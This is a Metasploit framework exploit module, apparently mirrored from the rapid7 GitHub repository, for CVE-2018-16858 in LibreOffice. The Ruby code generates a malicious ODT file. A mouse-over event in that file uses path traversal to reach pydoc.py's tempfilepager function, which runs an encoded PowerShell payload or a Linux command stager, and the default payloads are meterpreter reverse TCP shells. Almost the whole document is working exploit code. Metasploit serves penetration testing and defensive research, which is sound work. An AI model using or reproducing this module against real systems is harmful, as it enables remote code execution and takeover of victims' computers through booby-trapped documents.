Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
19669 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::FILEFORMAT

10
  include Msf::Exploit::Powershell

11
  include Msf::Exploit::CmdStager

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'LibreOffice Macro Code Execution',

18
        'Description' => %q{

19
          LibreOffice comes bundled with sample macros written in Python and

20
          allows the ability to bind program events to them. A macro can be tied

21
          to a program event by including the script that contains the macro and

22
          the function name to be executed. Additionally, a directory traversal

23
          vulnerability exists in the component that references the Python script

24
          to be executed. This allows a program event to execute functions from Python

25
          scripts relative to the path of the samples macros folder. The pydoc.py script

26
          included with LibreOffice contains the tempfilepager function that passes

27
          arguments to os.system, allowing RCE.

28


29
          This module generates an ODT file with a mouse over event that

30
          when triggered, will execute arbitrary code.

31
        },

32
        'License' => MSF_LICENSE,

33
        'Author' => [

34
          'Alex Inführ', # Vulnerability discovery and PoC

35
          'Shelby Pace' # Metasploit Module

36
        ],

37
        'References' => [

38
          [ 'CVE', '2018-16858' ],

39
          [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]

40
        ],

41
        'Platform' => [ 'win', 'linux' ],

42
        'Arch' => [ ARCH_X86, ARCH_X64 ],

43
        'Targets' => [

44
          [

45
            'Windows',

46
            {

47
              'Platform' => 'win',

48
              'Arch' => [ ARCH_X86, ARCH_X64 ],

49
              'Payload' => 'windows/meterpreter/reverse_tcp',

50
              'DefaultOptions' => { 'PrependMigrate' => true }

51
            }

52
          ],

53
          [

54
            'Linux',

55
            {

56
              'Platform' => 'linux',

57
              'Arch' => [ ARCH_X86, ARCH_X64 ],

58
              'Payload' => 'linux/x86/meterpreter/reverse_tcp',

59
              'DefaultOptions' => { 'PrependFork' => true },

60
              'CmdStagerFlavor' => 'printf',

61
            }

62
          ]

63
        ],

64
        'DisclosureDate' => "2018-10-18",

65
        'DefaultTarget' => 0,

66
        'Notes' => {

67
          'Reliability' => UNKNOWN_RELIABILITY,

68
          'Stability' => UNKNOWN_STABILITY,

69
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

70
        }

71
      )

72
    )

73


74
    register_options(

75
      [

76
        OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])

77
      ]

78
    )

79
  end

80


81
  def gen_windows_cmd

82
    opts =

83
      {

84
        :remove_comspec => true,

85
        :method => 'reflection',

86
        :encode_final_payload => true

87
      }

88
    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)

89
    @cmd << ' &amp;&amp; echo'

90
  end

91


92
  def gen_linux_cmd

93
    @cmd = generate_cmdstager.first

94
    @cmd << ' &amp;&amp; echo'

95
  end

96


97
  def gen_file(path)

98
    text_content = Rex::Text.rand_text_alpha(10..15)

99


100
    # file from Alex Inführ's PoC post referenced above

101
    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))

102
    libre_file = ERB.new(fodt_file).result(binding())

103
    libre_file

104
  rescue Errno::ENOENT

105
    fail_with(Failure::NotFound, 'Cannot find template file')

106
  end

107


108
  def exploit

109
    path = '../../../program/python-core-3.5.5/lib/pydoc.py'

110
    if datastore['TARGET'] == 0

111
      gen_windows_cmd

112
    elsif datastore['TARGET'] == 1

113
      gen_linux_cmd

114
    else

115
      fail_with(Failure::BadConfig, 'A formal target was not chosen.')

116
    end

117
    fodt_file = gen_file(path)

118


119
    file_create(fodt_file)

120
  end

121
end

122


123